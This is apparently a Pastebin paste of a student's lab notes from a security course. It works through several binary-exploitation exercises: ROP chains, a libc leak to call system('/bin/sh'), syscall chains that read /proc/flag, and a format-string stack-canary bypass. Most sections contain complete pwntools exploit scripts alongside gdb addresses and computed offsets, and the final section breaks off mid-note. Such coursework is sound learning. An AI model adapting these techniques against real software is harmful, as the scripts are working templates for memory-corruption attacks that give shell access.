Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- q1 basic-rop
- 0x8048648 <start+35>: lea eax,[ebp-0x3a]
- buffer start: EAX: 0xff913d3e --> 0xfffff769
- return: x/wx $ebp+4
- 0xff913d7c: 0x08048688
- using cyclic to find the return address so cyclic(62)
- using 0x8048450 (<puts@plt>: to leak the libc addr
- when we are looking at the got table: i see
- 0x0804a000 0x0804b000 rw-p /home/seclab/lab07/rop-basic/t
- and I find this:
- 0x804a00c <fgets@got.plt>: 0xf75deca0 (arg)
- print system get: 0xf760e310 <system>
- and bin/sh at 0xf7730cec ("/bin/sh")
- so arg - 145808 = system
- arg + 1044556 = "/bin/sh"
- overwrite return addr with:
- 0x8048450 (print)
- 0x08048625 (start)
- 0x804a00c(arg)
- #!/usr/bin/env python2
- import struct
- import subprocess as sp
- from pwn import *
- from binascii import hexlify
- context.update(arch='i386', os='linux')
- context.terminal = ['tmux', 'splitw', '-h']
- def run():
- payload = cyclic(62) + pack(0x8048450) + pack(0x08048625)+pack(0x804a00c)
- p = gdb.debug("./t", '''d
- b *start+38
- continue
- ''')
- #shell = "/bin/sh;"+ "%33816d%2391$hn"
- #p.recvline()
- p.recvline()
- p.sendline(payload)
- a = int("0x"+hexlify(p.recv(4)[::-1]),16)
- #print("addr " + a)
- system = a - 145808
- _bin = a + 1044556
- payload2 = cyclic(62) + pack(system) + pack(_bin) + pack(_bin)
- p.sendline(payload2)
- #p.sendline()
- #p.sendline("cat /proc/flag")
- #print(p.recvall(2))
- p.interactive()
- #p.close()
- #for i in range(5000):
- run()
- rop-64
- Call open_flag(), read_flag(), show_flag() with appropriate arguments.
- use cyclic to find the ret addr in start
- 0x0000000000400713: pop rdi; ret;
- ags: -559038737
- open_flag: 0x00000000004005bd
- //read_flag taks 2 args: arg1: 0x1234567 arg2: 0x89ABCDEF
- //read_flag starts at 0x0000000000400603
- //check calling convension: arg1 RDI, arg2: RSI
- //gadge:0x0000000000400713: pop rdi; ret;
- //gadge: 0x0000000000400711: pop rsi; pop r15; ret;
- 0x0000000000400713
- 0x1234567
- 0x0000000000400711
- 0x89ABCDEF
- 0xdeadbeef
- 0x0000000000400603
- //show_flag starts at 0x0000000000400652
- //show_flag taks no args
- 0x0000000000400652
- #!/usr/bin/env python2
- #a = int("0x"+hexlify(p.recv(4)[::-1]),16) reading print out addr
- import struct
- import subprocess as sp
- from pwn import *
- from binascii import hexlify
- context.update(arch='i386', os='linux')
- context.terminal = ['tmux', 'splitw', '-h']
- def run():
- read_flag = p64(0x0000000000400713) + p64(0x1234567) + p64(0x0000000000400711) + p64(0x89ABCDEF) + \
- p64(0xdeadbeef) + p64(0x0000000000400603)
- show_flag = p64(0x0000000000400652)
- payload = cyclic(40) + p64(0x0000000000400713) + p64(0xdeadbeef)+ p64(0x00000000004005bd) + \
- read_flag + show_flag
- p = gdb.debug("./t", '''d
- b *start+41
- continue
- ''')
- #shell = "/bin/sh;"+ "%33816d%2391$hn"
- #p.recvline()
- #p.recvline()
- p.sendline(payload)
- p.interactive()
- #p.close()
- #for i in range(5000):
- run()
- pop##################################
- //first we use cyclic to find the return addr which is cyclic(256)
- //0x08048093: popal; ret;
- 0x08048087: int 0x80; ret;
- 0x80490e8 is data segment
- first we want to open the /proc/flag file
- we want to have something looks like this for open
- pop
- ret
- eax 5
- ebx /proc/flag
- ecx 0
- edx 0
- esp
- ebp
- esi
- edi
- so we need to read "/proc/flag" to r/x segment first
- pop 0x08048093
- edi
- esi
- ebp
- esp cyclic(16)
- ebx 0
- edx 10
- ecx 0x80490e8
- eax 3
- 0x80 0x08048087
- and then we can open the file
- pop 0x08048093
- edi
- esi
- ebp
- esp cyclic(16)
- ebx 0x80490e8
- edx 0
- ecx 0
- eax 5
- 0x80 0x08048087
- and then we are going to read the buffer
- pop 0x08048093
- edi
- esi
- ebp
- esp cyclic(16)
- ebx 0x3
- edx 500
- ecx 0x80490e8
- eax 3
- 0x80 0x08048087
- last we are going to print out the file
- pop 0x08048093
- edi
- esi
- ebp
- esp cyclic(16)
- ebx 0x1
- edx 500
- ecx buff
- eax 4
- 0x80 0x08048087
- #!/usr/bin/env python2
- #a = int("0x"+hexlify(p.recv(4)[::-1]),16) reading print out addr
- import struct
- import subprocess as sp
- from pwn import *
- from binascii import hexlify
- context.update(arch='i386', os='linux')
- context.terminal = ['tmux', 'splitw', '-h']
- def run():
- h80 = 0x08048087
- pop = 0x08048093
- buff = 0x8049110
- bufsize = 2000
- read_filename = cyclic(256) + pack(0x08048093) + cyclic(16) + pack(0) + pack(10) + pack(buff) + pack(3) + pack(0x08048087)
- open_file = pack(0x08048093) +cyclic(16) + pack(buff) + pack(0)*2 + pack(5) + pack(h80)
- read_flie = pack(pop) + cyclic(16) + pack(0x3) + pack(2000) + pack(buff) + pack(3) + pack(h80)
- write_file = pack(pop) + cyclic(16) + pack(1) + pack(2000) + pack(buff) + pack(4) + pack(h80)
- payload = read_filename + open_file + read_flie + write_file
- p = gdb.debug("./t", '''d
- b *0x080480e6
- continue
- ''')
- #p.recvall(1)
- #sleep(1)
- p.sendline(payload)
- #p.recvline()
- #p.sendline("/proc/flag\0")
- p.interactive()
- #p.close()
- run()
- sprintf###################################
- we first print out the cannary value
- cannary was store in $rbp-0x8 which is 0x7fff150cbd88
- $rsp is 0x7fff150cba80
- (canary - $rsp)/8 = 97
- so we first print payload = "%97$lx %98$lx %99$lx %100$lx %101$lx %102$lx"
- and the cannary is store in %102$lx
- buffer starts at 0x7fff39f44370
- canary 0x7fff39f44578
- ret is at 0x7fff39f44588
- buffer - canary = 520
- ret - canary = 16
- then we use %520d to overwrite the canary value. but since canary ends at 00 so I first overwrite cannary as cannary +5 and then overwrite the last byte as 00
- Next we need to find the system value
- we first do a vmmap and find that
- 0x00400000 0x00401000 r-xp /home/seclab/lab07/sprintf/
- │0x00600000 0x00601000 r--p /home/seclab/lab07/sprintf/
- │0x00601000 0x00602000 rw-p /home/seclab/lab07/sprintf/target
- x/20g 0x00601000
- │0x601000: 0x0000000000600e28 0x00007ff00afca1c8
- │0x601010: 0x00007ff00adbc670 0x0000000000400646
- │0x601020 <__stack_chk_fail@got.plt>: 0x0000000000400656 0x0000000000400666
- │0x601030 <printf@got.plt>: 0x0000000000400676 0x0000000000400686
- │0x601040 <read@got.plt>: 0x0000000000400696 0x00007ff00a9fee50
- │0x601050 <__gmon_start__@got.plt>: 0x00000000004006b6 0x00007ff00aa4d5a0
- │0x601060 <sprintf@got.plt>: 0x00000000004006d6 0x0000000000000000
- │0x601070: 0x0000000000000000 0x0000000000000000
- │0x601080 <stdout@@GLIBC_2.2.5>: 0x00007ff00ada0400 0x00007ff00ada0640
- │vx601090 <completed.6973>: 0x0000000000000000 0x0000000000000000
- and luckily we see 0x00007ff00a9fee50 which is within libc
- 0x601048 <__libc_start_main@got.plt>: 0x00007fb3188fde50
- $9 = (<text variable, no debug info> *) 0x7fb318922590 <__libc_system>
- libc : 0x7fb318a5c503 --> 0x68732f6e69622f ('/bin/sh')
- 0x00007fb3188fde50 + 149312 = system
- + 1435315 = bin/sh
- so we first use overwrite return addr with puts
- call 0x400640 <puts@plt>
- and then overwrite the canary
- and we need to save the value in edi
- so we use pop rdi: 0x0000000000400973
- pop rdi 0x0000000000400973
- reg 0x601048
- print 0x400640
- so the whole payload will look like
- canary xxxx xxxx pop reg print
- but because the string stops at 00 so we need to overwrite the 00 bit one by one
- p.recvline(1)
- p.recvline(1)
- p.sendline(payload1)
- canary = "0x" + p.recvline().split(" ")[-1][:-1]
- print(canary)
- canary = int(canary,16)
- overwrite0(555, 560, p)
- payload = "%552d" + p64(0x400640)
- p.sendline(payload)
- overwrite0(547, 552,p)
- sleep(0.2)
- payload = "%544d" + p64(0x601048)
- p.sendline(payload)
- overwrite0(539, 544, p)
- sleep(0.2)
- payload = "%536d" + p64(0x400973)
- p.sendline(payload)
- sleep(0.2)
- payload = "%520d"+ p64(canary+5)
- p.sendline(payload)
- overwrite0(520, 521,p)
- sleep(1)
- p.sendline("n")
- next we get the reg value and calculate system and binsh
- addr = hexlify(p.recv(6)[::-1])
- addr = int("0x"+ addr,16)
- system = pack(addr + 149312)
- binsh = pack(addr + 1435315)
- start: 0x00000000004007cd
- pop rdi 0x0000000000400973
- binsh
- system
- #!/usr/bin/env python2
- #a = int("0x"+hexlify(p.recv(4)[::-1]),16) reading print out addr
- import struct
- import subprocess as sp
- from pwn import *
- from binascii import hexlify
- context.update(arch='i386', os='linux')
- context.terminal = ['tmux', 'splitw', '-h']
- def run():
- payload1 = "%102$lx"
- p = gdb.debug("./t", '''d
- b *0x0000000000400864
- b *0x00000000004008b2
- continue
- ''')
- #p.recvline(1)
- p.recvline(1)
- p.sendline(payload1)
- canary = "0x" + p.recvline().split(" ")[-1][:-1]
- print(canary)
- canary = int(canary,16)
- payload = "%560d" + p64(0x4007cd)
- p.sendline(payload)
- overwrite0(555, 560, p)
- sleep(0.2)
- payload = "%552d" + p64(0x400640)
- p.sendline(payload)
- overwrite0(547, 552,p)
- sleep(0.2)
- payload = "%544d" + p64(0x601048)
- p.sendline(payload)
- overwrite0(539, 544, p)
- sleep(0.2)
- payload = "%536d" + p64(0x400973)
- p.sendline(payload)
- sleep(0.2)
- payload = "%520d"+ p64(canary+5)
- p.sendline(payload)
- overwrite0(520, 521,p)
- sleep(1)
- p.sendline("n")
- sleep(0.2)
- p.recvuntil("'n'")
- sleep(0.2)
- print("### " + p.recvline())
- addr = hexlify(p.recv(6)[::-1])
- addr = int("0x"+ addr,16)
- system = p64(addr + 149312)
- binsh = p64(addr + 1435315)
- payload1 = "%102$lx"
- print("##### " + p.recvline(1))
- print("##### " + p.recvline(1))
- p.sendline(payload1)
- canary = "0x" + p.recvline().split(" ")[-1][:-1]
- print(canary)
- canary = int(canary,16)
- #overwrite0(555, 560, p)
- sleep(0.2)
- payload = "%552d" + system
- p.sendline(payload)
- overwrite0(550, 552,p)
- sleep(0.2)
- payload = "%544d" + binsh
- p.sendline(payload)
- overwrite0(539, 544, p)
- sleep(0.2)
- payload = "%536d" + p64(0x400973)
- p.sendline(payload)
- sleep(0.2)
- payload = "%520d"+ p64(canary+5)
- p.sendline(payload)
- overwrite0(520, 521,p)
- sleep(1)
- p.sendline("n")
- #p.sendline("/proc/flag\0")
- p.interactive()
- #p.close()
- def overwrite0(start, end, p):
- end = end - 1
- while(start <= end):
- payload = "%{}d".format(end) + chr(0)
- sleep(0.2)
- p.send(payload)
- end = end - 1
- run()
- # 0x00007fb0e9b25e50
- puzzle######################################################
- ROP_ATTACK_SUCCESS\0
- first we use cyclic to find the return addr and then overwrite it with strcpy
- and then the gadge is 0x0804889e: pop edi; pop ebp; ret;
- strcpy 0x8048540
- pop 0x0804889e
- buf 0x80488d0
- R 0x80488ed
- strcpy
- pop
- buf + 1
- O 0x80488ea
- P
- pop buf+3
- _ 0x80488f6
- A
- T
- T
- A
- C
- K
- _
- S
- U
- C
- C
- E
- S
- S
- #!/usr/bin/env python2
- #a = int("0x"+hexlify(p.recv(4)[::-1]),16) reading print out addr
- import struct
- import subprocess as sp
- from pwn import *
- from binascii import hexlify
- context.update(arch='i386', os='linux')
- context.terminal = ['tmux', 'splitw', '-h']
- pop = pack(0x0804889e)
- strcpy = pack(0x8048540)
- a = 0x80488dc
- buf = 0x804a030
- put = pack(0x8048550)
- def run():
- payload = cyclic(44)
- for i in "ROP_ATTACK_SUCCESS*":
- payload = payload + pbc(i)
- payload = payload + put + cyclic(4) + pack(0x804a030)
- #p = gdb.debug(["./v", payload], '''d
- # b main
- # continue
- # ''')
- p = gdb.debug("./t", '''d
- continue
- ''')
- p.sendline(payload)
- p.interactive()
- #p.close()
- def pbc(c):
- global pop
- global strcpy
- global a
- global buf
- b = strcpy + pop + pack(buf)
- if c == '_':
- b = b + pack(0x80488f6)
- elif c == '*':
- b = b + pack(0x80488f7)
- else:
- b = b + pack(a + ord(c) - ord('A'))
- buf = buf + 1
- return b
- if __name__ == "__main__":
- run()
- # 0x00007fb0e9b25e50
- uptoret##############################
- first we overwrite the return address to leave which will change how the esp points at. and the we overwrite the ebp with gbuf so that what's inside points to start
- and then we find a gadge
- 0x080486cd: pop esi; pop edi; pop ebp; ret;
- and we look at the got table we find that
- 0x804a024 <setvbuf@got.plt>: 0xf7646ec0
- 0xf7621310 <system>
- 0xf7743cec ("/bin/sh")
- got - 154544 = system
- got + 1035820 = bin/sh
- this two gadges helps adjust the stack pointer
- 0x080486cf: pop ebp; ret;
- 0x080484c8: leave; ret;
- #!/usr/bin/env python2
- #a = int("0x"+hexlify(p.recv(4)[::-1]),16) reading print out addr
- import struct
- import subprocess as sp
- from pwn import *
- from binascii import hexlify
- context.update(arch='i386', os='linux')
- context.terminal = ['tmux', 'splitw', '-h']
- def run():
- write = pack(0x8048430) + pack(0x080486cd) + pack(1) + pack(0x804a024) + pack(4)
- readsys = pack(0x80483e0) + pack(0x080486cd) + pack(0) + pack(0x804ad80) + pack(0x100)
- stackpoint = pack(0x080486cf) + pack(0x804ad7c) + pack(0x080484c8)
- payload = pack(1) + write + readsys + stackpoint +cyclic(216) + pack(0x804a080) + pack(0x80485fa)
- p = gdb.debug("./t", '''d
- b *0x080485fb
- continue
- ''')
- #print("####1 " + p.recvline(1))
- p.sendline(payload)
- print("###2 " + p.recvline(1))
- a = "0x"+hexlify(p.recv(4)[::-1])
- print(a)
- a = int(a, 16)
- system = pack(a -154544)
- binsh = pack(a + 1035820)
- #print("sending ...")
- sleep(1)
- p.sendline(system + pack(0x080486cf) + binsh)
- p.interactive()
- #p.close()
- if __name__ == "__main__":
- run()
- # 0x00007fb0e9b25e50
- find gadge ##########
- we first find that $rsp+17*8 is a value in libc
- 0x600fe0 <read@got.plt>: 0x00007f1f65d01320
- and then we find the addr of system and bin/sh
- system: 0x7f1f65c58590
- binsh: 0x7f1f65d92503
- r - 691600 = s
- r + 594403 = b
- and then we are going to overwrite ret with print to print out the got value
- 0x0000000000400631: pop rsi; pop r15; ret;
- rsi 0x600fe0
- cyclic(8)
- write 0x400450
- and the we use it to calculate the system and bin sh value and then we jump back to main and buffer overflow it again
- #!/usr/bin/env python2
- #a = int("0x"+hexlify(p.recv(4)[::-1]),16) reading print out addr
- import struct
- import subprocess as sp
- from pwn import *
- from binascii import hexlify
- context.update(arch='i386', os='linux')
- context.terminal = ['tmux', 'splitw', '-h']
- def run():
- write = p64(0x000000000040057d) + p64(0x0000000000400631) + p64(0x600fe0) + p64(0) + p64(0x400450)
- #read = p64(0x0000000000400633) + p64(0) + p64(0x0000000000400631) + p64(0x601a00)+ p64(0) + p64(0x400460)
- main = p64(0x40057e)
- payload =cyclic(107, n=8) + write + main
- p = gdb.debug("./t", '''d
- b *0x0000000000400589
- continue
- ''')
- p.sendline(p64(107+6*10))
- p.sendline(payload)
- p.recvuntil("aaaa")
- p.recv(107+6*8-4)
- sleep(1)
- reg = p.recv(80)
- print("### " + hexlify(reg[7:15]) + "###")
- #print("#### " + p.recv(98+10*8) + "#####")
- #print("####. " + reg + "####")
- #p.sendline(p64(170))
- reg = "0x" + hexlify(reg[7:15][::-1])
- reg = int(reg, 16)
- system = reg - 691600
- binsh = reg + 594403
- print("system " + hex(system) + " bin " + hex(binsh))
- #sleep(1)
- #p.sendline(p64(106+8*5))
- #sleep(1)
- payload = cyclic(120, n=8) + p64(system) + p64(0x0000000000400633) + p64(binsh) + p64(system)
- #print("send line")
- #p.sendline(p64(170))
- #p.recvline()
- #print("### " + p.recvline())
- p.send(p32(170))
- p.sendline(payload)
- #print("#### " + p.recv(98+8*8) + "#####")
- #sleep(2)
- #p.sendline("cat /proc/flag")
- p.interactive()
- #p.close()
- if __name__ == "__main__":
- run()
- # 0x00007fb0e9b25e50
- #####rop sorting####
- the list is store in 0x804a040
- libc addr is in [0xfff9e11c] 0xf75cfaf3
- libc : 0xf75c35cf ("qsort")
- r - libc = var
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement